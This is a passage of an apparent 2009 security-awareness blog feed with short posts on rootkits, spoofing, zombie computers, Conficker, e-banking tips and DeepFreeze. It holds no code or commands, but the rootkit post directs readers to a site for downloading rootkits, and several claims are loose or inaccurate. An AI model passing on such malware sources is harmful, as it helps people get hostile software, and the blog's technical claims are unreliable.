href='http://creatingcomputervirus.blogspot.com/feeds/5567400287503915308/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/know-your-computers-internet-security.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/5567400287503915308'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/5567400287503915308'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/know-your-computers-internet-security.html' title='Know your Computer&apos;s internet security'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-7404248244151305029</id><published>2009-05-14T03:13:00.000-07:00</published><updated>2009-05-14T03:49:45.043-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='rootkit'/><category scheme='http://www.blogger.com/atom/ns#' term='trojans'/><title type='text'>Want to know about Rootkits ?</title><content type='html'>You may noticed that while you perform scan for the virus with an anti virus software, it may sometimes display Rootkits found. Want to know about the Rootkits? Here is a small description about the Rootkits. Rootkit is a software which is a program or a combination of more programs that are designed to hide the fact that a system has been compromised. The rootkits are to be installed by the attacker in the target machine phisically by himself or by exploiting the system vulnerabilities. Once the rootkit is installed in the target system, the attacker can modify the system files and hide the running process of the attacker installed files. The rootkits often forms a back door in the system allowing the attacker to steal the data from the system without knowing the user.&lt;br /&gt;Actually Rootkits are evolved as a software to handle the system when the system falls in to a non-responsive state. Later the hackers have turned this to a malware. The applications which creates the virtual devices like Demon Tools uses the Rootkits to hide certain system activity and to supress certain process of the system. The Kaspersky antivirus uses the rootkits to hide and protect their files from the attack of the malwares.&lt;br /&gt;Most antiviruses are not capable of finding the rootkits. Even some of the antiviruses found certain types of rootkits, they cannot find all types of the Rookits. Fortunatley softwares for finding the Rootkits (like Rootkit Revealer) are available in the market for finding and deleting the Rootkits. Most of the Rootkits are installed in the target machine by the user in the form of patch or key generator. Lots of Rootkits are available in the internet for downloading. If you want one visit: http://vx.netlux.org/.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-7404248244151305029?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/7404248244151305029/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/want-to-know-about-rootkits.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7404248244151305029'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7404248244151305029'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/want-to-know-about-rootkits.html' title='Want to know about Rootkits ?'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-8383321949280809232</id><published>2009-05-11T19:45:00.000-07:00</published><updated>2009-05-11T20:30:44.809-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='e-banking'/><title type='text'>Make e-banking more secure...</title><content type='html'>We are familiar with the stories of several people who lost their money via e-banking. The banks are stepping up security as the cases of money loss through the e-banking increases. But in most case the money loss is due to the unawareness of the user rather than the security provided by the banks. Here are some tips that would helpful in increasing your security in e-banking:&lt;br /&gt;&lt;br /&gt;    * Do not use computers in internet cafe or computers in other institutions that you found less secure. It is always better to use your own personal computer for this purposes. The computers in internet cafe has less security as it contains lots of malware or spywares and viruses. It may steal your account details and sent this details to the hacker. These details will help the hacker to take money from your account easily. Some computers in the internet cafes are installed with anti virus softwares. But do not trust this as a high secure because in most internet cafes the anti virus softwares are not updated periodically. This softwares cannot prevent newly formed spywares.&lt;br /&gt;    * Use a good anti-virus software in your computer. It is more important that you must update the anti virus software periodically. This enables the software to detect more and more viruses and thus increase the security of your computer.&lt;br /&gt;    * Use a firewall other than windows firewall so that we can monitor the usage of internet by the programs in the computer and can block the programs that does not require internet connection.&lt;br /&gt;    * Always go to the website by typing the URL in the address field directly. Do not go to the website through the search engine, as it may lead to the spoofed website. The spoofed website may look similar to the original website so that the user believe that he has reached the original website. The user will enter the details in the spoofed website and his money will be utilized by the hacker. It is also important to check whether you have entered the correct address or not.&lt;br /&gt;    * Use a good browser like firefox or internet explorer for browsing.&lt;br /&gt;    * Do not save passwords in the browser. The saved password can be stealed by the hacker by understanding the algorithm of the browser.&lt;br /&gt;    * Also check whether the prefix of the URL in the address field is https instead of http.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-8383321949280809232?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/8383321949280809232/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/make-e-banking-more-secure.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8383321949280809232'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8383321949280809232'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/make-e-banking-more-secure.html' title='Make e-banking more secure...'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-1029579278997016162</id><published>2009-05-08T07:26:00.000-07:00</published><updated>2009-05-08T07:26:00.924-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='website'/><category scheme='http://www.blogger.com/atom/ns#' term='spoofing'/><title type='text'>Website Spoofing</title><content type='html'>Website spoofing is the practice of creating website as a hoax. The reader feel that the website was created by a different person or organization. In most cases the readers reach these sites by making small mistakes while entering the URL in the address bar. For example if the user enters www.virsu.com instead of www.virus.com, he may reach the spoofed site. (This is only an example and doesn't mean that www.virsu.com is a spoofed site.)  URL redirection is a technique used for spoofing. URL redirection is generally used to redirect a user to a specific website. ie, to have more URLs for a specific website. These facility is illegally used for spoofing. Another method used is the usage of control characters. The control characters are non-printable characters that are represented by ASCII codes. The main motive in website spoofing is to publish false information regarding a person or authority or organisation.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-1029579278997016162?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/1029579278997016162/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/website-spoofing.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/1029579278997016162'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/1029579278997016162'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/website-spoofing.html' title='Website Spoofing'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-4511019536611826456</id><published>2009-05-07T22:37:00.000-07:00</published><updated>2009-05-07T22:37:01.080-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IP address spoofing'/><category scheme='http://www.blogger.com/atom/ns#' term='email'/><title type='text'>e-mail spoofing</title><content type='html'>e-mail spoofing is a technique used to sent the spam mails. In e-mail spoofing the sender address and the other parts of the e-mail header are modified in such a way that the recipient feels that the e-mail was from a different source. If the attacker requires response from&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_mPzqYV2-K04/SgEutVrZRuI/AAAAAAAAAG8/YdX1q71lvKE/s1600-h/emailspoofing.gif"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 189px; height: 179px;" src="http://2.bp.blogspot.com/_mPzqYV2-K04/SgEutVrZRuI/AAAAAAAAAG8/YdX1q71lvKE/s320/emailspoofing.gif" alt="" id="BLOGGER_PHOTO_ID_5332594790231525090" border="0" /&gt;&lt;/a&gt; the recipient, he adds his e-mail address to the reply to field. This is helpful in finding the attacker. But in some cases the attacker mounts false address in the place of the reply to field. In such cases the the reply of the recipient may badly affect the innocent third person.&lt;br /&gt;There are softwares that generate random e-mail addresses for the attacker to use. If the recipient finds the origin of the email, it is rare that the e-mail is active. Some of the worms uses mass mailing. Here the worm infects a user. When the user opens the e-mail, it triggers the worm and the worm will start reading the address book of the user and then sends e-mail to the other users whose address is in the address book of the first user.  If the gateway blocks this infected mail, a message showing that a virus has been blocked.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-4511019536611826456?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/4511019536611826456/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/e-mail-spoofing.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4511019536611826456'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4511019536611826456'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/e-mail-spoofing.html' title='e-mail spoofing'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_mPzqYV2-K04/SgEutVrZRuI/AAAAAAAAAG8/YdX1q71lvKE/s72-c/emailspoofing.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-6251121378247304115</id><published>2009-05-06T07:38:00.000-07:00</published><updated>2009-05-06T07:38:00.237-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IP address spoofing'/><category scheme='http://www.blogger.com/atom/ns#' term='Denial of Service (DoS) attack'/><title type='text'>IP Address Spoofing</title><content type='html'>The protocol that is generally used to communicate between the systems is Internet Protocol (IP).&lt;br /&gt;The data is sent through the internet in the form of packets. Each packet has a header which contains general information about the packet. The header of the packet in the IP contains the source address and the destination address. The source address is generally the IP address of the system from where the packet is sent over the internet and the destination address is the IP address of the system to which the data is sent. In IP address spoofing the source address in the header is replaced by a false address and is sent to the target system. The responce from the target system is sent &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_mPzqYV2-K04/SgBVls2RrXI/AAAAAAAAAG0/etlOIcG26sE/s1600-h/IP+address+spoofing.gif"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 242px; height: 214px;" src="http://2.bp.blogspot.com/_mPzqYV2-K04/SgBVls2RrXI/AAAAAAAAAG0/etlOIcG26sE/s320/IP+address+spoofing.gif" alt="" id="BLOGGER_PHOTO_ID_5332356064988999026" border="0" /&gt;&lt;/a&gt;to the false address. The attacker may be able to predict the responce from the target machine or he can direct the responce to his IP address.&lt;br /&gt;    The IP spoofing is usually done in Denial of Service (DoS) attack. Here the attacker doesn't need to know the responce of the target machine. He need just to sent the packets to the target with false address. Each packet to the target may be fixed with diferent false source address. So it is difficult to filter the unnecessary packets.&lt;br /&gt;   It is difficult for the attacker for attacking a system which requires authentication, but it is possible to attack the target to some extend. In some networks for example in the case of a network in the bank every system is interconnected and it may not require authentication to communicate between these systems. If the attacker wins in gaining access to one of the system in the bank, he can simply attack the whole network.&lt;br /&gt;One of the method to prevent spoofing is to filter the incomming and the outgoing packets. The gateway to a network usually perfoms ingress filtering, which will prevent the data comming from the outside network with source address within the network. Similarly the gateway performs engress filtering which prevents the packets with source address outside the network. These measures prevents the spoofing only to some extend.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-6251121378247304115?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/6251121378247304115/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/ip-address-spoofing.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6251121378247304115'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6251121378247304115'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/ip-address-spoofing.html' title='IP Address Spoofing'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_mPzqYV2-K04/SgBVls2RrXI/AAAAAAAAAG0/etlOIcG26sE/s72-c/IP+address+spoofing.gif' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-8654168099076907853</id><published>2009-05-05T07:00:00.000-07:00</published><updated>2009-05-05T07:24:00.557-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='spyware'/><category scheme='http://www.blogger.com/atom/ns#' term='Cyber Spying'/><title type='text'>Cyber Spying</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_mPzqYV2-K04/SgBLbhaFsbI/AAAAAAAAAGs/Q6bMD6prNBU/s1600-h/Cyber+Spying.gif"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 238px; height: 205px;" src="http://2.bp.blogspot.com/_mPzqYV2-K04/SgBLbhaFsbI/AAAAAAAAAGs/Q6bMD6prNBU/s320/Cyber+Spying.gif" alt="" id="BLOGGER_PHOTO_ID_5332344895003013554" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Cyber Spying is the practice of stealing data or information from a computer without the knowledge of the owner. The Cyber Spying targets competitors, government,enemies, economists, politicians etc. Cyber Spying may be done on a computer located at far away from the attacker. Cyber Spying can be done with the help of several malicious softwares including virus, trojan, spyware etc. The Cyber Spying is done at work place by a computer professional or at home by a trained professional hacker. Cyber Spying is done by infiltrating in to the computer network in the illegal way. There were strong laws to prevent Cyber Spying.&lt;br /&gt;&lt;br /&gt;You will get a detailed information from :&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.rainbowskill.com/internet-fundas/all-about-chinese-cyber-spying.php"&gt;http://www.rainbowskill.com/internet-fundas/all-about-chinese-cyber-spying.php&lt;/a&gt;&lt;br /&gt;&lt;img src="file:///C:/Documents%20and%20Settings/Prabin%20P.B/Desktop/Cyber%20Spying.gif" alt="" /&gt;&lt;img src="file:///C:/Documents%20and%20Settings/Prabin%20P.B/Desktop/Cyber%20Spying.gif" alt="" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-8654168099076907853?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/8654168099076907853/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/cyber-spying.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8654168099076907853'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8654168099076907853'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/cyber-spying.html' title='Cyber Spying'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_mPzqYV2-K04/SgBLbhaFsbI/AAAAAAAAAGs/Q6bMD6prNBU/s72-c/Cyber+Spying.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-2529052904159521555</id><published>2009-05-03T19:05:00.000-07:00</published><updated>2009-05-03T19:38:43.090-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='zombie'/><category scheme='http://www.blogger.com/atom/ns#' term='Virus attack'/><category scheme='http://www.blogger.com/atom/ns#' term='trojans'/><title type='text'>A zombie computer</title><content type='html'>Many people knew that a hacker can use a computer connected to internet for his illegal purposes. Such computers which are connected to the internet that obeys a hacker via a virus or trojan is called a zombie computer. The computer became a zombie when a v&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mPzqYV2-K04/Sf5U6B6CmgI/AAAAAAAAAF4/yejRD4x1HxI/s1600-h/zombie.gif"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 232px; height: 214px;" src="http://3.bp.blogspot.com/_mPzqYV2-K04/Sf5U6B6CmgI/AAAAAAAAAF4/yejRD4x1HxI/s320/zombie.gif" alt="" id="BLOGGER_PHOTO_ID_5331792364774267394" border="0" /&gt;&lt;/a&gt;irus or trojan gets installed the computer. There may be several such computers working simultaneously for a particular hacker. This makes it difficult to trace the hacker. Since the owner of the computer is unaware of this, the computer is known as zombies.&lt;br /&gt;Zombies are generally used for sending spam emails and for the spreading of the trojans or computer viruses. This help the spammers not only to save their bandwidth cost but also to remain undetected. Certain hackers use zombies to commit click fraud against the sites displaying the pay per click advertisement. The hackers use the zombies for the Denial of Service (DoS) attack. Here the hacker sends unnecessary packets to the targeted website so that the legal users cannot access the website. The intense flooding can be easily found out and prevented, but the pulsating flooding remain unidentified for several months or years. The DoS attack is even done against the  top sites like yahoo,ebay etc.&lt;br /&gt;Network Intrusion-prevention systems (NIPS) are usually useful for preventing, detecting and blocking zombie computers.Computer users frequently perform backups and delete suspicious mail messages as preventive measures against infection.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-2529052904159521555?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/2529052904159521555/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/zombie-computer.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2529052904159521555'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2529052904159521555'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/zombie-computer.html' title='A zombie computer'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_mPzqYV2-K04/Sf5U6B6CmgI/AAAAAAAAAF4/yejRD4x1HxI/s72-c/zombie.gif' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-4157576813359979552</id><published>2009-04-30T07:35:00.000-07:00</published><updated>2009-04-30T08:20:16.531-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='conflicker'/><category scheme='http://www.blogger.com/atom/ns#' term='worm'/><title type='text'>Conflicker : Want to know more ?</title><content type='html'>Most of the computer users were afraid of Conflicker worm. Conflicker is a worm that affects the computers running on windows. Conflicker exploits the vulnerabilities of win&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mPzqYV2-K04/SfnA-usRxII/AAAAAAAAAFw/5UFd_-zYWKw/s1600-h/conflicker.gif"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 262px; height: 174px;" src="http://3.bp.blogspot.com/_mPzqYV2-K04/SfnA-usRxII/AAAAAAAAAFw/5UFd_-zYWKw/s320/conflicker.gif" alt="" id="BLOGGER_PHOTO_ID_5330503817887859842" border="0" /&gt;&lt;/a&gt;dows that became the headache of many computer users. The name conflicker is derived from the words 'configure' and the German word 'ficker' which means fucker. Conflicker was discovered in November 2008. It propagates through the internet and exploits the vulnerability of network services in windows (windows 2000,windows server 2003, windows XP, windows vista and windows server 2008. Microsoft has released the patch to counter the conflicker. Conflicker has 5 varients: A,B,C,D and E.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Symptoms of infection&lt;span style="font-style: italic;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;In 13 February 2009, Microsoft is offering a $USD250,000 reward for information leading to the arrest and conviction of the individuals behind the creation and/or distribution of Conficker worm.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-4157576813359979552?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/4157576813359979552/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/04/conflicker-want-to-know-more.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4157576813359979552'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4157576813359979552'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/04/conflicker-want-to-know-more.html' title='Conflicker : Want to know more ?'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_mPzqYV2-K04/SfnA-usRxII/AAAAAAAAAFw/5UFd_-zYWKw/s72-c/conflicker.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-4688140290148841679</id><published>2009-04-29T03:13:00.000-07:00</published><updated>2009-04-29T03:30:50.243-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='conflicker'/><category scheme='http://www.blogger.com/atom/ns#' term='precautions'/><title type='text'>Protect your PC from conflicker</title><content type='html'>There are several ways to protect the PC from conflicker. Since it affects PC's running on Windows, most PC users are troubled with it. The methods of protecting the PC from conflicker is the common procedure for the removal of virus.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Use a good and updated anti-virus software that is capable of detecting and healing the infected areas.&lt;/li&gt;&lt;li&gt;Download latest patch from the Microsoft's website.&lt;/li&gt;&lt;/ul&gt;                Link is - http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Turn on the firewall.&lt;/li&gt;&lt;li&gt;If a outbreak of conflicker (or any other virus) in future is predicted, save a backup copy of all the data in your system to an external storage device like CD or DVD.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-4688140290148841679?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/4688140290148841679/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/04/protect-your-pc-from-conflicker.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4688140290148841679'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4688140290148841679'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/04/protect-your-pc-from-conflicker.html' title='Protect your PC from conflicker'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-7032381577625765755</id><published>2009-04-20T22:11:00.000-07:00</published><updated>2009-04-20T22:35:53.039-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Deepfreeze'/><category scheme='http://www.blogger.com/atom/ns#' term='Anti-Virus'/><title type='text'>DeepFreeze: Substitute for antivirus software</title><content type='html'>Most people install anti-virus and does not update it. This will give chance to the new viruses to escape from the virus scan done by the anti-virus software. Some anti-viruses even updated may do not have the virus signatures so the presence of certain viruses will not be discovered. A software by Faronics Corporation removes the difficulty for updating the anti-virus software. DeepFreeze is not an anti-virus software. But it will prevent the attack of the viruses very efficiently.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_mPzqYV2-K04/Se1a5ApoELI/AAAAAAAAAFY/LAja3kKajMM/s1600-h/DeepFreeze.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 204px;" src="http://4.bp.blogspot.com/_mPzqYV2-K04/Se1a5ApoELI/AAAAAAAAAFY/LAja3kKajMM/s320/DeepFreeze.jpg" alt="" id="BLOGGER_PHOTO_ID_5327013869722800306" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;The DeepFreeze allows the user to freeze the drive he wants including the drive in which the operating system is installed. After freezing the drive we cannot save or make changes in data or files in the freezed drive. We can save a file in the freezed drive. But during the system restart the file will be lost. While saving a file in the freezed drive, no warning will be displayed about the loss of data during the next restart. So the usage of DeepFreeze must be done in a careful manner.&lt;br /&gt;We can save a file or install a software permanantly in the freezed drive only after making the DeepFreeze in Thawed mode. For making the DeepFreeze in the Thawed mode press shift and click on the icon of the DeepFreeze in the system tray. A window will appear on the screen. The set a password and then you can chabge the DeepFreeze to Thawed mode in a few mouse clicks.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-7032381577625765755?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/7032381577625765755/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/04/deepfreeze-substitute-for-antivirus.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7032381577625765755'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7032381577625765755'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/04/deepfreeze-substitute-for-antivirus.html' title='DeepFreeze: Substitute for 